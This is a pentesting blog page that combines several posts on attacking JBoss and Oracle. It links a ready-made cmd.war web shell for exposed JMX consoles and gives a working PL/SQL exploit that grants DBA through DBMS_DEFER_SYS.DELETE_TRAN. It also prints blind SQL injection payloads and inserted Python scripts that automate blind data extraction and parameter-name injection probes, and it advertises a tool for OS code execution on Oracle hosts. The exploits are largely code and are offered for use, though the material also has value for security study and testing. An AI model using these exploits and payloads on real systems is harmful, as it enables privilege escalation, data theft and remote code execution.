www.notsosecure.com

From Pentesters To Pentesters

Often, while doing internal infrastructure assessments, it's common to find unrestricted access to the JBoss JMX console. This web interface allows deployment of arbitrary WAR files, so anyone who can reach it can deploy their own web application onto the server. Here is an excellent article describing the process:
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf

Here is a war file, ready to use: cmd.war (zipped)
Once deployed, check for this file on the vulnerable JBoss instance: http://victim:8080/cmd/cmd.jsp

Happy Hacking :)
————————–

I will be conducting two one-day Oracle Security trainings in November and December.

November 19th 2009:
Venue: New Delhi, India
Course Agenda/Outline: http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html

At OWASP India, I will also be giving a talk. The talk is titled 'Hacking Oracle From Web'. Here I will discuss some advanced techniques for exploiting SQL/PL/SQL injections targeting an Oracle back-end, along with the security problems of other Oracle components such as Oracle Application Server, Application Portal, Secure Backup, etc.

December 14th 2009
Venue: 7Safe, Sawston, Cambridge, U.K
Course Agenda/Outline:
http://7safe.com/oracle_database_security_training_course.htm

The exploit for this vulnerability (SQL injection in DBMS_DEFER_SYS.DELETE_TRAN) is in Metasploit, but I could not find it on milw0rm or at any other exploit repository. It was patched in the July 2008 CPU.

So, if you need to use it outside Metasploit, here it is:

DECLARE
  D NUMBER;
BEGIN
  -- Open a cursor and parse (but do not yet execute) the PL/SQL block we want
  -- run from inside the SYS-owned package: it grants DBA to the SCOTT user.
  D := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(D, 'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott''; commit; end;', 0);
  -- The second argument is concatenated into a dynamic SQL statement inside
  -- DBMS_DEFER_SYS. Closing the string early lets us call dbms_sql.execute()
  -- on our cursor; the trailing -- comments out the remainder of the statement.
  DBMS_DEFER_SYS.DELETE_TRAN('aaaaaa', 'a'' and dbms_sql.execute(' || D || ')=1--');
END;
/


I have received a few emails from people asking me to explain what I mean by this and when it could be useful. First, this is nothing new; most people would file it under the 'difficult boolean logic' category of SQL injection. Anyway, here's a better explanation and a more realistic example:

Imagine a PHP script that uses the same piece of user input in the construction of two SQL queries:

$sql_1 = "select foo from bar where uid =5 and id ='" . $_GET['id'] . "'";
$sql_2 = "select foo2 from bar2 where id in ('" . $_GET['id'] . "')";

So, the same input goes into two different SQL queries: once inside parentheses and once without. Next, assume the application logic only checks whether a query succeeded or not. Any query that runs without error, regardless of how many rows it returns, produces the normal page, while a SQL error produces a different error page. In this situation it is hard to use a comment (--) to discard the rest of the query, because in one of the two queries the input sits inside parentheses that still have to be closed, and a payload that closes them breaks the other query. For the same reason, a UNION is not practical either.

Now, you can use a CASE expression to throw an error ('subquery returns more than one row') whenever the injected condition is false, which turns this into a boolean-based blind SQL injection: the error page is the oracle.

e.g:
select foo from bar where uid =5 and id ='injection' and (case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end) and '1'='1';

select foo2 from bar2 where id in ('injection' and (case when (1=1) then 1 else 1*(select table_name from information_schema.tables) end) and '1'='1');

In the above example the payload is syntactically valid in both queries. When the condition is false (e.g. 1=2), the ELSE branch places a multi-row subquery in a scalar context, so the first query raises the subquery error and the application shows its error page, while the second query remains syntactically correct. Now replace (1=1) and (1=2) with your own boolean condition and extract data one true/false answer at a time.
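As an added illustration (this is not code from the original post), the following Python script models the two queries above, builds the CASE payload for an arbitrary boolean condition, checks that the payload closes cleanly in both contexts (and that a comment-based payload does not), and runs the blind extraction loop that the error page makes possible. The HTTP request is replaced by a simulated oracle over a constructed secret so that it runs offline; the condition syntax (length(), ascii(), substring()) is MySQL-style and is an assumption, as is the secret value.

```python
import re

# Added example, not from the original post. It models the post's two
# string-built queries, generates the CASE payload for any boolean condition,
# and runs the blind extraction loop that the error page makes possible.
# The network step is replaced by a simulated oracle over a constructed secret
# so the script runs offline; the condition syntax (length()/ascii()/
# substring()) is MySQL-style and is an assumption.

def build_queries(user_input):
    """The post's two vulnerable queries: the same input lands once in a plain
    quoted context and once inside parentheses."""
    sql_1 = "select foo from bar where uid =5 and id ='" + user_input + "'"
    sql_2 = "select foo2 from bar2 where id in ('" + user_input + "')"
    return sql_1, sql_2

def case_payload(condition):
    """CASE-based payload. It closes cleanly in both contexts; when `condition`
    is false the ELSE branch puts a multi-row subquery in scalar context, which
    the DBMS rejects and the application turns into its error page."""
    return ("injection' and (case when (" + condition + ") then 1 "
            "else 1*(select table_name from information_schema.tables) end) "
            "and '1'='1")

def closes_cleanly(sql):
    """Pre-flight check: do quotes and parentheses balance once the application
    has appended its own trailing characters? Text after '--' (outside a string)
    is treated as a comment, so the check also shows why the comment trick
    fails in the parenthesised context."""
    depth, in_str, i = 0, False, 0
    while i < len(sql):
        ch = sql[i]
        if in_str:
            in_str = ch != "'"
        elif ch == "'":
            in_str = True
        elif sql.startswith("--", i):
            break
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
        i += 1
    return depth == 0 and not in_str

def extract(oracle, expr, max_len=64):
    """Character-by-character blind extraction of the scalar SQL expression
    `expr`. `oracle(condition)` must return True when the application served
    its normal page (condition true) and False when it served the error page."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle("length(" + expr + ")>=" + str(pos)):
            break                               # no character at this position
        lo, hi = 0, 127                         # binary search over ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("ascii(substring(" + expr + "," + str(pos) + ",1))>" + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

SECRET = "scott@db1"   # constructed stand-in for the value of (select user())

def simulated_oracle(condition):
    """Stand-in for: GET vuln.php?id=<case_payload(condition)> and test whether
    the response is the error page. Understands only the two condition shapes
    extract() emits, and answers them against SECRET."""
    m = re.fullmatch(r"length\((.+)\)>=(\d+)", condition)
    if m:
        return len(SECRET) >= int(m.group(2))
    m = re.fullmatch(r"ascii\(substring\((.+),(\d+),1\)\)>(\d+)", condition)
    if m:
        return ord(SECRET[int(m.group(2)) - 1]) > int(m.group(3))
    raise ValueError("unsupported condition: " + condition)

if __name__ == "__main__":
    for q in build_queries(case_payload("1=1")):
        print(closes_cleanly(q), q)             # True for both contexts
    for q in build_queries("injection' or 1=1-- "):
        print(closes_cleanly(q), q)             # True for sql_1, False for sql_2
    print(extract(simulated_oracle, "(select user())"))
```

In a real engagement, simulated_oracle is replaced by a function that sends case_payload(condition) as the id parameter and returns False when the response is the error page. The binary search costs about seven requests per character, and the length probe at the start of each position ends the loop once the value is exhausted.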
————–
Further, in one of my slides at OWASP AU I mentioned the areas that automated SQL injection scanners generally miss. The above example is one such scenario. Recently, I have seen a few applications where the form parameter's name, not just its value, is used in the SQL query.
So imagine a URL like:

http://vuln.com/vuln.php?product_id[234]=books

Now, it is common practice to fuzz the parameter value (books), but not many tools will fuzz the parameter name. PHP parses product_id[234] into an array whose key (234) comes straight from the request, so the key is just as attacker-controlled as the value. Recently I have seen a few SQL injections in the parameter name:

http://vuln.com/vuln.php?product_id[234' or '1'='1]=books
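Added example (not from the original post): a short Python model of why the parameter name is a separate injection point. It mimics how PHP populates $_GET from product_id[234]=books (simplified to one level of brackets and ignoring PHP's name-mangling rules), feeds the resulting array key into a constructed vulnerable query, and generates probe URLs that mutate the key rather than the value. The sink query and its table and column names are constructed for the example.

```python
from urllib.parse import parse_qsl, quote, urlsplit

# Added example, not from the original post. It shows (1) how PHP turns
# product_id[234]=books into an array whose *key* is attacker-controlled,
# (2) a constructed sink that concatenates that key into SQL, and (3) how to
# generate probes that mutate the key rather than the value, which is the
# spot the post says scanners usually skip. The PHP parsing is a simplified
# model (one level of brackets, no name-mangling rules).

def php_style_parse(query):
    """Simplified model of how PHP populates $_GET: 'name[key]=value' becomes
    {'name': {'key': 'value'}}. The key is taken verbatim after URL-decoding,
    so everything between the brackets is under the requester's control."""
    params = {}
    for raw_name, value in parse_qsl(query, keep_blank_values=True):
        if "[" in raw_name and raw_name.endswith("]"):
            name, key = raw_name[:-1].split("[", 1)
            params.setdefault(name, {})[key] = value
        else:
            params[raw_name] = value
    return params

def vulnerable_sink(params):
    """Constructed stand-in for the vulnerable application: the array key,
    not the value, is concatenated into the query."""
    keys = params.get("product_id")
    if not isinstance(keys, dict):
        return []
    return ["select name from products where product_id = '" + key + "'"
            for key in keys]

def key_probes(url, probe):
    """One URL per bracketed parameter, with `probe` appended to the key.
    Value-only fuzzers never produce these requests."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    urls = []
    for i, (raw_name, value) in enumerate(pairs):
        if "[" in raw_name and raw_name.endswith("]"):
            name, key = raw_name[:-1].split("[", 1)
            mutated = list(pairs)
            mutated[i] = (name + "[" + key + probe + "]", value)
            query = "&".join(quote(n, safe="[]") + "=" + quote(v) for n, v in mutated)
            urls.append(parts._replace(query=query).geturl())
    return urls

if __name__ == "__main__":
    for u in key_probes("http://vuln.com/vuln.php?product_id[234]=books", "' or '1'='1"):
        print(u)
        for sql in vulnerable_sink(php_style_parse(urlsplit(u).query)):
            print("  ->", sql)
```

Running it prints the probe URL with the injected key percent-encoded, followed by the query the constructed sink would execute, which ends in `'234' or '1'='1'`.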

Hope this helps…

This is an updated version of bsqlbf. It now includes the VALIDATE_REMOTE_RC() exploit which David Litchfield discussed in his paper:

6: Type 6 is O.S code execution [ORACLE DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit]

This vulnerability was patched by Oracle in the July 2009 Critical Patch Update. In a nutshell, if you have identified a SQL injection that executes as the 'SYS' user, then this version of bsqlbf will let you execute OS code on the remote Oracle database host.

I will be giving a demo of this at Sec-T on 11th September.